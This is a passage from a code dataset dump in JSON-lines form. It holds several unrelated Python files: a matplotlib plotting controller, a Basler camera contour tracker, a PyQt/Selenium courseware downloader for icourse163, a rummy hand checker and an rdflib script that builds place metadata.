max iteration\n return\n\n if draw_iter is not None and draw_iter < batch[-1]:\n draw_idx = batch <= draw_iter\n X, Y, Y_expected, batch = X[draw_idx], Y[draw_idx], Y_expected[draw_idx], batch[draw_idx]\n max_iter = batch[-1]\n pareto = check_pareto(Y, self.problem_cfg['obj_type'])\n \n # replot evaluated & pareto points\n self.scatter_x = X\n n_obj = Y.shape[1]\n if n_obj == 2:\n self.scatter_y.set_offsets(Y)\n self.scatter_y_pareto.set_offsets(Y[pareto])\n elif n_obj == 3:\n self.scatter_y._offsets3d = Y.T\n self.scatter_y_pareto._offsets3d = Y[pareto].T\n \n # rescale plot according to Y and true_pfront\n n_obj = self.problem_cfg['n_obj']\n x_min, x_max = np.min(Y[:, 0]), np.max(Y[:, 0])\n y_min, y_max = np.min(Y[:, 1]), np.max(Y[:, 1])\n if n_obj == 3: z_min, z_max = np.min(Y[:, 2]), np.max(Y[:, 2])\n if self.pfront_limit is not None:\n x_min, x_max = min(x_min, self.pfront_limit[0][0]), max(x_max, self.pfront_limit[1][0])\n y_min, y_max = min(y_min, self.pfront_limit[0][1]), max(y_max, self.pfront_limit[1][1])\n if n_obj == 3: z_min, z_max = min(z_min, self.pfront_limit[0][2]), max(z_max, self.pfront_limit[1][2])\n x_offset = (x_max - x_min) / 20\n y_offset = (y_max - y_min) / 20\n if n_obj == 3: z_offset = (z_max - z_min) / 20\n self.view.ax1.set_xlim(x_min - x_offset, x_max + x_offset)\n self.view.ax1.set_ylim(y_min - y_offset, y_max + y_offset)\n if n_obj == 3: self.view.ax1.set_zlim(z_min - z_offset, z_max + z_offset)\n\n # replot new evaluated & predicted points\n line_vis = True\n for line in self.line_y_pred_list:\n line_vis = line_vis and line.get_visible()\n line.remove()\n self.line_y_pred_list = []\n\n if max_iter > 0:\n last_batch = np.where(batch == max_iter)[0]\n if n_obj == 2:\n self.scatter_y_new.set_offsets(Y[last_batch])\n self.scatter_y_pred.set_offsets(Y_expected[last_batch])\n elif n_obj == 3:\n self.scatter_y_new._offsets3d = Y[last_batch].T\n self.scatter_y_pred._offsets3d = Y_expected[last_batch].T\n for y, y_expected in 
zip(Y[last_batch], Y_expected[last_batch]):\n                line = self.view.ax1.plot(*[[y[i], y_expected[i]] for i in range(n_obj)], '--', color='m', alpha=0.5)[0]\n                line.set_visible(line_vis)\n                self.line_y_pred_list.append(line)\n        else:\n            empty_y = np.empty((0, n_obj))\n            if n_obj == 2:\n                self.scatter_y_new.set_offsets(empty_y)\n                self.scatter_y_pred.set_offsets(empty_y)\n            elif n_obj == 3:\n                self.scatter_y_new._offsets3d = empty_y.T\n                self.scatter_y_pred._offsets3d = empty_y.T\n\n        self.view.fig.canvas.draw()\n\n    def toggle_performance_visibility(self, event):\n        '''\n        Toggle visibility of plotted objs\n        '''\n        plot_obj = self.picker_map[event.artist]\n        vis = not plot_obj.get_visible()\n        plot_obj.set_visible(vis)\n        if vis:\n            event.artist.set_color('black')\n        else:\n            event.artist.set_color('gray')\n\n        if not self.scatter_y_new.get_visible() or not self.scatter_y_pred.get_visible():\n            for line in self.line_y_pred_list:\n                line.set_visible(False)\n        if self.scatter_y_new.get_visible() and self.scatter_y_pred.get_visible():\n            for line in self.line_y_pred_list:\n                line.set_visible(True)\n\n        self.view.fig.canvas.draw()\n\n    def save_performance_figure(self, path, title=None):\n        '''\n        Save the performance-space figure to disk\n        '''\n        self.view.save_performance_figure(path, title=title)\n\n    def save_design_figure(self, path, title=None):\n        '''\n        Save the design-space figure to disk\n        '''\n        self.view.save_design_figure(path, self.line_x, self.bar_x, self.text_x, title=title)","sub_path":"system/scientist/viz/space/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":13878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"521815865","text":"from collections import deque\n\nimport cv2\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle\nfrom pypylon import pylon, genicam\n\ncountOfImagesToGrab = 1\nmaxCamerasToUse = 2\n\n# Initialize all cameras\ntry:\n    # Get the transport layer factory.\n    tlFactory = pylon.TlFactory.GetInstance()\n\n    # Get all attached devices and exit application if no device is found.\n    devices = tlFactory.EnumerateDevices()\n    if len(devices) == 0:\n        raise pylon.RUNTIME_EXCEPTION(\"No camera present.\")\n\n    # Create an array of instant cameras for the found devices and avoid exceeding a maximum number of devices.\n    cameras = pylon.InstantCameraArray(min(len(devices), maxCamerasToUse))\n\nexcept genicam.GenericException as e:\n    # Error handling\n    print(\"An exception occurred. 
{}\".format(e))\n exitCode = 1\n\nOffSet = {1: {'X': 500, 'Y': 250}, 0: {'X': 270, 'Y': 120}}\n\ntest = {}\n\ndef init(camera_id, camera, devices):\n # conecting to the first available camera\n #camera = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())\n test[camera_id] = camera\n camera.Attach(tlFactory.CreateDevice(devices[camera_id]))\n camera.Open()\n camera.StopGrabbing()\n b = camera.IsOpen()\n a = camera.GetDeviceInfo().GetModelName()\n b = camera.GetDeviceInfo().GetSerialNumber()\n c = camera.GetDeviceInfo().GetIpAddress()\n camera.GetDeviceInfo().SetFriendlyName('Camera1'.format('utf-8'))\n d = camera.GetDeviceInfo().GetFriendlyName()\n camera.Width = 550\n e = getattr(camera, 'Width').GetValue()\n camera.Height = 550\n camera.OffsetX.SetValue(OffSet[camera_id]['X'])\n camera.OffsetY = OffSet[camera_id]['Y']\n camera.GainAuto = 'Off'\n camera.GainRaw = 0\n camera.BlackLevelRaw.SetValue(-30)\n camera.TriggerSource = \"Line1\"\n camera.trigger_mode.SetValue(\"On\")\n camera.TriggerDelayAbs.SetValue(185000)\n camera.ExposureTimeAbs.SetValue(15000.0)\n camera.BalanceRatioRaw.SetValue(64)\n camera.AcquisitionFrameRateEnable.SetValue(False)\n camera.AcquisitionFrameRateAbs.SetValue(5)\n camera.PixelFormat.SetValue(\"Mono8\")\n converter = pylon.ImageFormatConverter()\n\n # Transport layer\n # Packet Size\n camera.GevSCPSPacketSize.SetValue(1500)\n # Inter-Packet Delay\n camera.GevSCPD.SetValue(1000)\n\n # converting to opencv bgr format\n converter.OutputPixelFormat = pylon.PixelType_Mono8\n converter.OutputBitAlignment = pylon.OutputBitAlignment_MsbAligned\n\n return converter\n\n\ndef read(camera, converter):\n grabResult = camera.RetrieveResult(1500, pylon.TimeoutHandling_ThrowException)\n if grabResult.GrabSucceeded():\n # Access the image data\n image = converter.Convert(grabResult)\n #img = imutils.resize(image.GetArray(), width=480, height=480)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n grabResult.Release()\n arr = image.GetArray()\n return arr\n\n\ndef image_treat(image):\n img = cv2.GaussianBlur(image, (3, 3), 0)\n return img\n\n\ndef calc(img, threshold=50):\n # apply thresholding\n\n ret, thresh = cv2.threshold(img, threshold, 255, 0)\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n longest_contour = 0\n longest_contour_index = 0\n i = 0\n for contour in contours:\n if longest_contour < contour.shape[0]:\n longest_contour_index = i\n longest_contour = contour.shape[0]\n i += 1\n #plt.figure()\n #plt.imshow(img)\n # edge detection\n # apply Canny edge detection\n #tight = cv2.Canny(thresh, threshold, 255)\n\n # calculate the centre of moment\n #cv2.drawContours(img, contours[longest_contour_index], -1, (0, 255, 0), 3)\n M = cv2.moments(contours[longest_contour_index])\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n return thresh, contours, cX, cY\n\n\nconverters = []\n\nfor i, camera in enumerate(cameras):\n print(f'Camera {i} is initializing')\n converters.append(init(i, camera, devices))\n camera.StartGrabbing(pylon.GrabStrategy_LatestImageOnly)\n#cameras.StartGrabbing(pylon.GrabStrategy_LatestImageOnly, pylon.GrabLoop_ProvidedByInstantCamera)\none, two = 1, 0\ncamera1 = cameras[one]\nconverter1 = converters[one]\ncamera2 = cameras[two]\nconverter2 = converters[two]\n\n\n# Figure\nfig = plt.figure(figsize=(8.5, 5.5))\n# create two subplots\n\nax_im1 = fig.add_subplot(3, 2, 1)\n\nax1_x = fig.add_subplot(3, 2, 
ax1_x = fig.add_subplot(3, 2, 3)\nax1_x.set_ylim(275, 300)\nax1_x.set_ylabel('X1 position')\n\nax1_y = fig.add_subplot(3, 2, 5)\nax1_y.set_ylim(260, 285)\nax1_y.set_ylabel('Y1 position')\n\n\n\n# create two image plots\nimg1 = read(camera1, converter1)\n\npositionsX1 = deque([], maxlen=120)\npositionsY1 = deque([], maxlen=120)\n\nim1_1 = ax_im1.imshow(calc(img1)[0], cmap='gray', vmin=0, vmax=255)\nim1_2 = ax_im1.imshow(img1, cmap='gray', vmin=0, vmax=255, alpha=0.6)\nXpos1, = ax1_x.plot([1], [1], marker='o', markersize=2, color='b', linestyle='')\nYpos1, = ax1_y.plot([1], [1], marker='o', markersize=2, color='b', linestyle='')\n\nfig.show()\n\nplt.ion()\n\nwhile camera1.IsGrabbing():\n    [p.remove() for p in reversed(ax_im1.patches)]\n    img1 = read(camera1, converter1)\n    img2 = read(camera2, converter2)\n    img1 = image_treat(img1)\n    img2 = image_treat(img2)\n    thresh1, contours1, cX1, cY1 = calc(img1)\n    positionsX1.append(cX1)\n    positionsY1.append(cY1)\n    im1_1.set_data(thresh1)\n    im1_2.set_data(img1)\n\n    circle1 = Circle((cX1, cY1), radius=10, color='black', zorder=10)\n    ax_im1.add_patch(circle1)\n    x1 = list([i for i in range(len(positionsX1))])\n    Xpos1.set_data(x1, positionsX1)\n    Ypos1.set_data(x1, positionsY1)\n\n    ax1_x.relim()\n    ax1_y.relim()\n    ax1_x.autoscale_view(True, True, True)\n    ax1_y.autoscale_view(True, True, True)\n    plt.pause(0.2)\n\nplt.ioff()\nfig.show()\n\n# Releasing the resources (fixed: stop every camera, not just the last loop variable)\nfor cam in cameras:\n    cam.StopGrabbing()\n","sub_path":"utilities/mytests/test_pypylon/CameraBasler_1camera.py","file_name":"CameraBasler_1camera.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"273426021","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport threading\nimport time\n\nimport PyQtBase\nimport requests\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nimport traceback\n\nrequests.adapters.DEFAULT_RETRIES = 5\ndriver_path = os.path.join(os.getcwd(), 'chromedriver.exe')\nprint('os.getcwd() {}'.format(driver_path))\ndriver = webdriver.Chrome(driver_path)\n\n\nclass UI(QtWidgets.QFrame):\n    logsListItemCountChanged = QtCore.pyqtSignal(str)\n    comicRetileCompleted = QtCore.pyqtSignal(str)\n\n    def __init__(self, parent=None):\n        super(UI, self).__init__(parent)\n        global driver\n        self.wait = WebDriverWait(driver, 10)\n        self.initUI()\n\n    def initUI(self):\n        self.vbox = QtWidgets.QVBoxLayout()\n\n        self.initUrlRow()\n        self.initFileSaveRow()\n\n        self.setLayout(self.vbox)\n        self.setObjectName('mooc')\n\n    def initUrlRow(self):\n        hbox = QtWidgets.QHBoxLayout()\n\n        label = QtWidgets.QLabel('课件URL')\n        label.setAlignment(QtCore.Qt.AlignCenter)\n        label.setProperty('class', 'mooc-label')\n\n        self.urlEdit = QtWidgets.QLineEdit()\n        self.urlEdit.setProperty('class', 'mooc-line-edit')\n\n        start_btn = QtWidgets.QPushButton('开始')\n        start_btn.setProperty('class', 'comic-btn')\n        start_btn.setCursor(QtCore.Qt.PointingHandCursor)\n        start_btn.clicked.connect(self.startReptileMoocEvent)\n        self.startBtn = start_btn\n\n        hbox.addWidget(label)\n        hbox.addWidget(self.urlEdit)\n        hbox.addWidget(start_btn)\n        hbox.setStretchFactor(label, 1)\n        hbox.setStretchFactor(self.urlEdit, 5)\n
        hbox.setStretchFactor(start_btn, 1)\n\n        self.vbox.addLayout(hbox)\n\n    def initFileSaveRow(self):\n        hbox = QtWidgets.QHBoxLayout()\n\n        label = QtWidgets.QLabel('保存目录')\n        label.setAlignment(QtCore.Qt.AlignCenter)\n        label.setProperty('class', 'mooc-label')\n\n        self.savePathEdit = PyQtBase.CustomizeLineEditEvent()\n        self.savePathEdit.setProperty('class', 'mooc-line-edit')\n        self.savePathEdit.setToolTip('双击选择文件保存路径')\n        # self.savePathEdit.textChanged.connect(self.filePathChangeEvent)\n        self.savePathEdit.mouseDoubleClicked.connect(\n            self.selectorSavePathEvent)\n\n        selector_btn = QtWidgets.QPushButton('路径...')\n        selector_btn.setProperty('class', 'mooc-btn')\n        selector_btn.setCursor(QtCore.Qt.PointingHandCursor)\n        selector_btn.clicked.connect(self.selectorSavePathEvent)\n\n        hbox.addWidget(label)\n        hbox.addWidget(self.savePathEdit)\n        hbox.addWidget(selector_btn)\n        hbox.setStretchFactor(label, 1)\n        hbox.setStretchFactor(self.savePathEdit, 5)\n        hbox.setStretchFactor(selector_btn, 1)\n\n        self.vbox.addLayout(hbox)\n\n    def selectorSavePathEvent(self, event):\n        dirPath = QtWidgets.QFileDialog().getExistingDirectory(\n            self, '选择保存路径', '')\n        if dirPath:\n            if os.path.exists(dirPath):\n                self.savePathEdit.setText(dirPath)\n\n    # courseware URL, save path, chapter range [a, b] (chapter a through chapter b; the default [0, 0] means all)  # courseware_url, path, c_range=[0, 0]\n    def get_courseware(self):\n        global driver\n        t = 0\n        while t < 2:\n            try:\n                driver.get(self.courseware_url)\n                h3 = self.wait.until(\n                    EC.element_to_be_clickable((\n                        By.CSS_SELECTOR,\n                        \"#g-body > div.m-learnhead > div > div > div > a.f-fl > h4\"\n                    )))\n                school_name = re.findall(r'/([a-zA-Z]+)-',\n                                         self.courseware_url)[0]\n                title = h3.text\n                path1 = os.path.join(self.path, title + \"_\" + school_name)\n                if not os.path.exists(path1):\n                    os.makedirs(path1)\n                # total number of chapters\n                h3_count = len(\n                    driver.find_elements_by_css_selector(\n                        \"div > div.m-learnChapterList> div.m-learnChapterNormal > div.titleBox > h3\"\n                    ))\n                if self.c_range[1] == 0:\n                    c_range2 = h3_count\n                else:\n                    c_range2 = self.c_range[1]\n                for index in range(3 + self.c_range[0], 3 + c_range2):\n                    try:\n                        driver.refresh()\n                        h3 = self.wait.until(\n                            EC.element_to_be_clickable((\n                                By.CSS_SELECTOR,\n                                \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child(3) > div.titleBox > h3\"\n                            )))\n                        h3.click()\n                        h3 = self.wait.until(\n                            EC.element_to_be_clickable((\n                                By.CSS_SELECTOR,\n                                \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child({}) > div.titleBox > h3\"\n                                .format(index))))\n                        h3_text = h3.text\n                        print(\"h3_text {}:\".format(h3_text), end=\"\\t\")\n                        patten = re.compile('.*?第(.{1,3})(周|章).*?')\n                        match = re.match(patten, h3_text)\n                        if match:\n                            week = match.group(0)\n                        else:\n                            week = h3_text\n                        h3.click()\n                        time.sleep(3)\n                        file_count = len(\n                            driver.find_elements_by_xpath(\n                                '//div[@class=\"f-icon lsicon f-fl \"]/span[@class=\"u-icon-doc\"]'\n                            ))\n                        print(\"file_count \", file_count)\n                        week = str(index - 3) + week.replace(\":\", \"-\").replace(\"/\", \" \").replace(\"\\\\\", \" \").replace(\"课件:\", \" \")\n                        path = os.path.join(path1, week)\n                        if not os.path.exists(path):\n                            os.makedirs(path)\n                        for f_index in range(1, file_count + 1):\n                            # title = driver.find_element_by_xpath('//div[@class=\"f-icon lsicon f-fl \"][{}]/span[@class=\"u-icon-doc\"]/..'.format(f_index))\n                            title = self.wait.until(\n                                EC.element_to_be_clickable((\n                                    By.XPATH,\n                                    '(//div[contains(@class,\"f-icon lsicon f-fl \")]/span[@class=\"u-icon-doc\"])[{}]/..'\n                                    .format(f_index))))\n                            title = title.get_attribute(\"title\")\n
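                            # note (editor): each attachment row is addressed by a 1-based XPath\n                            # index; clicking a row opens the document page whose '文档下载' link\n                            # carries the real file URL used by download() below.\n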
lsicon f-fl \")]/span[@class=\"u-icon-doc\"])[{}]/..'\n .format(f_index)).click()\n time.sleep(0.2)\n download_btn = self.wait.until(\n EC.element_to_be_clickable(\n (By.PARTIAL_LINK_TEXT, '文档下载')))\n self.download_url = download_btn.get_attribute(\n \"href\")\n title = title.replace(\":\", \"-\").replace(\n \"/\", \" \").replace(\"\\\\\", \" \").replace(\n \"课件:\",\n \" \").replace(\"/\", \" \").replace('文档:', '')\n print(\"week title\", week, \" \", title)\n suffix = self.download_url.split(\".\")[-1]\n self.file_name = path + \"\\\\\" + title + \".\" + suffix.split(\n '&')[0]\n print('文件名: ', self.file_name)\n self.download()\n driver.back()\n time.sleep(1)\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child(3) > div.titleBox > h3\"\n )))\n h3.click()\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child({}) > div.titleBox > h3\"\n .format(index))))\n h3.click()\n except TimeoutException as e:\n print('超时 ', e)\n traceback.print_exc()\n except ElementClickInterceptedException as e:\n print('点击失败 ', e)\n traceback.print_exc()\n t = 5\n except FileNotFoundError:\n print(\n \"FileNotFoundError: [Errno 2] No such file or directory: \")\n t += 1\n\n def download(self):\n headers = {\n 'Host':\n 'hubble.netease.com',\n 'Origin':\n 'https://www.icourse163.org',\n 'Referer':\n self.download_url.split(\"#\")[0],\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'\n }\n if not os.path.exists(\n self.file_name) or os.path.getsize(self.file_name) <= 10:\n with open(self.file_name, \"wb\") as f:\n r = requests.get(self.download_url,\n headers=headers,\n verify=False)\n f.write(r.content)\n f.close()\n print(\"\\t下载成功:{}\".format(self.file_name))\n else:\n print(\"\\t文件已存在:{}\".format(self.file_name))\n\n def startReptileMoocEvent(self):\n # 课件地址 存储路径 范围[a, b](第a章到第b章,默认[0, 0]表示全部)\n self.courseware_url = self.urlEdit.text()\n self.path = self.savePathEdit.text()\n self.c_range = [0, 0]\n if len(self.courseware_url) > 0 and len(self.path) > 0:\n td = threading.Thread(target=self.threadMethod, name='mooc')\n td.start()\n\n def threadMethod(self):\n self.get_courseware()\n # 退出浏览器\n global driver\n driver.quit()\n\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n m = UI()\n m.show()\n sys.exit(app.exec_())\n","sub_path":"python/pyqt/tools/mooc.py","file_name":"mooc.py","file_ext":"py","file_size_in_byte":11318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216506395","text":"def check_pure(L) :\n if check_pure_equal(L) :\n return True\n c = 0\n c = check_pure_half1(L) + c\n c = check_pure_half2(L) + c\n if c == 2 :\n return True\n else :\n return False\n\ndef check_pure_half2(L) :\n c = 0\n if len(L) == 4 :\n if L[0][0] == L[1][0] == L[2][0] == L[3][0] :\n c = c + 1\n if len(L) == 3 :\n if L[0][0] == L[1][0] == L[2][0]:\n c = c + 1\n if len(L) == 2 :\n if L[0][0] == L[1][0] :\n c = c + 1\n return c\n\ndef check_pure_equal(L) :\n if len(L) == 4 :\n \tif L[0] == L[1] == L[2] == L[3]:\n return True\n elif len(L) == 3 :\n if L[0] == L[1] == L[2]:\n return True\n elif len(L) == 2 :\n if L[0] == L[1]:\n return True\n else :\n return False\n\n\ndef check_pure_half1(L) :\n\n n = 0\n c = 0\n for i in range(0, len(L0)- 1) :\n if L[0][1] == L0[i] :\n for j in range(1, len(L)) :\n 
                i = i + 1\n                if i < len(L0) - 1 :\n                    if(L[j][1] != L0[i]) :\n                        n = n + 1\n                        break\n            if n == 0 :\n                c = c + 1\n                break\n    return c\n\n\ndef check_jokers(L) :\n\n    pos = []\n    for i in range(0, len(L)) :\n        if L[i] == \"joker\" :\n            pos.append(i)\n    return pos\n\n\ndef check_impure(L) :\n\n    L_new = []\n    L_new1 = []\n    pos = []\n    pos = check_jokers(L)\n\n    if len(pos) == 1 :\n        if pos[0] == 0:\n            L_new = L[1 : len(L)]\n\n            if check_pure(L_new) :\n                return True\n\n        if pos[0] == len(L) - 1 :\n            L_new = L[0 : len(L) - 1]\n\n            if check_pure(L_new) :\n                return True\n\n        if len(L) == 3 :\n\n\n            if pos[0] == 1 :\n                L_new = [x for x in L if x != \"joker\"]\n\n                if position(L_new) == -2 and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n                    return True\n\n        if len(L) == 4 :\n\n            if pos[0] == 1 :\n                L_new1.append(L[0])\n                L_new1.append(L[2])\n                L_new.append(L[2])\n                L_new.append(L[3])\n                t1 = position(L_new1)\n                t2 = position(L_new)\n\n                if t1 == -2 and t2 == -1 and (check_pure_half2(L_new1) or check_pure_equal(L_new1))and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n                    return True\n\n            if pos[0] == 2 :\n                L_new1.append(L[0])\n                L_new1.append(L[1])\n                L_new.append(L[1])\n                L_new.append(L[3])\n                t1 = position(L_new1)\n                t2 = position(L_new)\n\n                if t1 == -1 and t2 == -2 and (check_pure_half2(L_new1) or check_pure_equal(L_new1))and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n                    return True\n    if len(L) == 4 :\n        if len(pos) == 2:\n            if pos[0] == 0 and pos[1] == 3 :\n                L_new = [x for x in L if x != \"joker\"]\n                if check_pure(L_new) :\n                    return True\n            if (pos[0] == 0 and pos[1] == 2) or (pos[0] == 1 and pos[1] == 3):\n                L_new = [x for x in L if x != \"joker\"]\n                if position(L_new) == -2 and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n                    return True\n\n            if pos[0] == 1 and pos[1] == 2 :\n                L_new = [x for x in L if x != \"joker\"]\n                if position(L_new) == -3 and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n                    return True\n    return False\n\n\ndef position(L) :\n    n = 0\n    for i in range(0, len(L0)) :\n        if L[0][1] == L0[i] :\n            pos1 = i\n            for j in range(pos1 + 1, len(L0)) :\n                if i < len(L0):\n                    if L[1][1] == L0[j] :\n                        pos2 = j\n                        n = n + 1\n                        break\n        if n != 0 :\n            break\n    if n == 0 :\n        return False\n    return (pos1 - pos2)\n\ndef check_set(L) :\n    c = 0\n    j = check_jokers(L)\n    if len(j) == 0 :\n        if L[0][1] == L[1][1] == L[2][1] :\n            c = c + 1\n        if (L[0][0] != L[1][0] and L[0][0] != L[2][0] and L[1][0] != L[2][0]) :\n            c = c + 1\n        if c == 2 :\n            return True\n\n    if len(j) == 1 :\n        L_new = [x for x in L if x != \"joker\"]\n        if L_new[0][1] == L_new[1][1] :\n            c = c + 1\n        if L_new[0][0] != L_new[1][0] :  # fixed: compare suits, not a suit against the whole card string\n            c = c + 1\n        if c == 2 :\n            return True\n    if len(j) == 2 :\n        return True\n    return False\n\n\ndef only_two_jokers(L) :\n    c = 0\n    for i in range(0, len(L)) :\n        if L[i] == \"joker\" :\n            c = c + 1\n    return c\n\nprint(\"\\n\")\nprint(\"RUMMY DECLARATION CHECKER\\n\")\nprint(\"List1 = [H, S, D, C]\\n\")\nprint(\"\"\"List2 = ['A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K', 'A']\\n\"\"\")\nprint(\"'joker' - Joker\\n\")\nprint(\"NOTE : T - value is 10\\n\")\nprint(\"\"\"Take one element from List1 and another from List2 as a string and it represents a card\\n\"\"\")\nprint(\"Ex : H3 - Suit is Heart and Face value is 3\\n\")\nprint(\"NOTE : Only two Jokers are accepted\\n\")\nL = []\nL0 = ['A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K', 'A']\nL1 = []\nL2 = []\nL3 = []\nL4 = []\nwhile True :\n    count = 0\n    print(\"Please enter your LIFE1 of 4 cards on plank 1\")\n    st = input(\"By giving spaces b/w each card 
name\\n\")\n L1 = st.split()\n count = only_two_jokers(L1) + count\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n continue\n if len(L1) == 4 :\n break\n else :\n print(\"Please enter only 4 cards\")\n\nwhile True :\n print(\"Please enter your LIFE2 of 3 cards on planck 2\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L2 = st.split()\n count = count + only_two_jokers(L2)\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n count = count - only_two_jokers(L2)\n continue\n if len(L2) == 3 :\n break\n else :\n print(\"Please enter only 3 cards\")\nwhile True :\n print(\"Please enter your LIFE or SET of 3 cards on planck 3\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L3 = st.split()\n count = count + only_two_jokers(L3)\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n count = count - only_two_jokers(L3)\n continue\n if len(L3) == 3 :\n break\n else :\n print(\"Please enter only 3 cards\")\n\nwhile True :\n print(\"Please enter your LIFE or SET of 3 cards on planck 4\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L4 = st.split()\n count = count + only_two_jokers(L4)\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n count = count - only_two_jokers(L4)\n continue\n if len(L4) == 3 :\n break\n else :\n print(\"Please enter only 3 cards\")\n\ncount1 = 0\nL5 = []\nif check_pure(L1) :\n L5.append(\"P\")\nif check_impure(L1) :\n L5.append(\"I\")\nif check_pure(L2) :\n L5.append(\"P\")\nif check_impure(L2) :\n L5.append(\"I\")\nif (check_pure(L3) or check_impure(L3) or check_set(L3)) :\n count1 = count1 + 1\n L5.append(count1)\nif (check_pure(L4) or check_impure(L4) or check_set(L4)) :\n count1 = count1 + 1\n L5.append(count1)\n\nif L5 == [\"P\", \"I\", 1, 2] or L5 == [\"I\", \"P\", 1, 2] or L5 == [\"P\", \"P\", 1, 2]:\n print(\"Congratulations! 
You completed the SHOW\")\nelse :\n    print(\"Sorry, your cards don't make any SHOW\")\n","sub_path":"rummy.py","file_name":"rummy.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"143192855","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport csv\nfrom time import sleep\nimport pandas as pd\nimport json\nimport os\nfrom PIL import Image\nimport yaml\nimport requests\nimport sys\nimport argparse\n\nfrom rdflib import URIRef, BNode, Literal, Graph\nfrom rdflib.namespace import RDF, RDFS, FOAF, XSD\nfrom rdflib import Namespace\n\nf = open(\"../settings.yml\", \"r+\")\nprefix = yaml.load(f, Loader=yaml.SafeLoader)[\"prefix\"]\n\nall = Graph()\n\n###########\n\njson_open = open(\"data/data.json\", 'r')\ngeo = json.load(json_open)\n\nfor sheet in geo:\n\n    rows = sheet[\"value\"]\n\n    for row in rows:\n        if \"uri\" not in row or row[\"uri\"] == \"\":  # fixed: 'or', so a row without the key is skipped instead of raising KeyError\n            continue\n        subject = URIRef(row[\"uri\"])\n\n        stmt = (subject, RDFS.label, Literal(row[\"rdfs:label\"]))\n        all.add(stmt)\n\n        stmt = (subject, RDF.type, URIRef(\"https://jpsearch.go.jp/term/type/Place\"))\n        all.add(stmt)\n\n        for key in row:\n            if \"description:\" in key:\n                ln = key.replace(\"description:\", \"\").strip()\n                stmt = (subject, URIRef(\"http://schema.org/description\"), Literal(ln+\": \"+row[key]))\n                all.add(stmt)\n            elif \"schema:description\" in key:\n                if row[key] == \"\":\n                    continue\n                stmt = (subject, RDFS.comment, Literal(row[key]))\n                all.add(stmt)\n            elif \"schema:geo\" in key:\n                if row[key] == \"\":\n                    continue\n                geo = URIRef(row[key])\n                stmt = (subject, URIRef(\"http://schema.org/geo\"), geo)\n                all.add(stmt)\n\n                stmt = (geo, URIRef(\"http://schema.org/latitude\"), Literal(float(row[\"schema:latitude\"])))\n                all.add(stmt)\n\n                stmt = (geo, URIRef(\"http://schema.org/longitude\"), Literal(float(row[\"schema:longitude\"])))\n                all.add(stmt)\n            elif \"schema:url\" in key:\n                manifest = URIRef(row[key])\n                stmt = (subject, URIRef(\"http://schema.org/url\"), manifest)\n                all.add(stmt)\n\n                stmt = (manifest, RDF.type, URIRef(\"http://iiif.io/api/presentation/2#Manifest\"))\n                all.add(stmt)\n            elif \"schema:relatedLink\" in key:\n                stmt = (subject, URIRef(\"http://schema.org/relatedLink\"), URIRef(row[key]))\n                all.add(stmt)\n            elif \"schema:isPartOf\" in key:\n                parent = URIRef(row[key])\n                stmt = (parent, URIRef(\"http://schema.org/spatial\"), subject)\n                all.add(stmt)\n\n                '''\n                stmt = (parent, RDFS.label, Literal(row[\"parent:label\"]))\n                all.add(stmt)\n                '''\n\n                parent_id = row[key].split(\"/\")[-1]\n\n                stmt = (subject, URIRef(\"https://jpsearch.go.jp/term/property#sourceData\"), URIRef(prefix + \"/curation/\" + parent_id + \".json\"))\n                all.add(stmt)\n\n\n\n            elif \"schema:image\" in key:\n                stmt = (subject, URIRef(\"http://schema.org/image\"), URIRef(row[key]))\n                all.add(stmt)\n\n            elif \"schema:category\" in key:\n                if row[key] == \"\":\n                    continue\n\n                stmt = (subject, URIRef(\"http://schema.org/category\"), Literal(row[key]))\n                all.add(stmt)\n\n\n\npath = 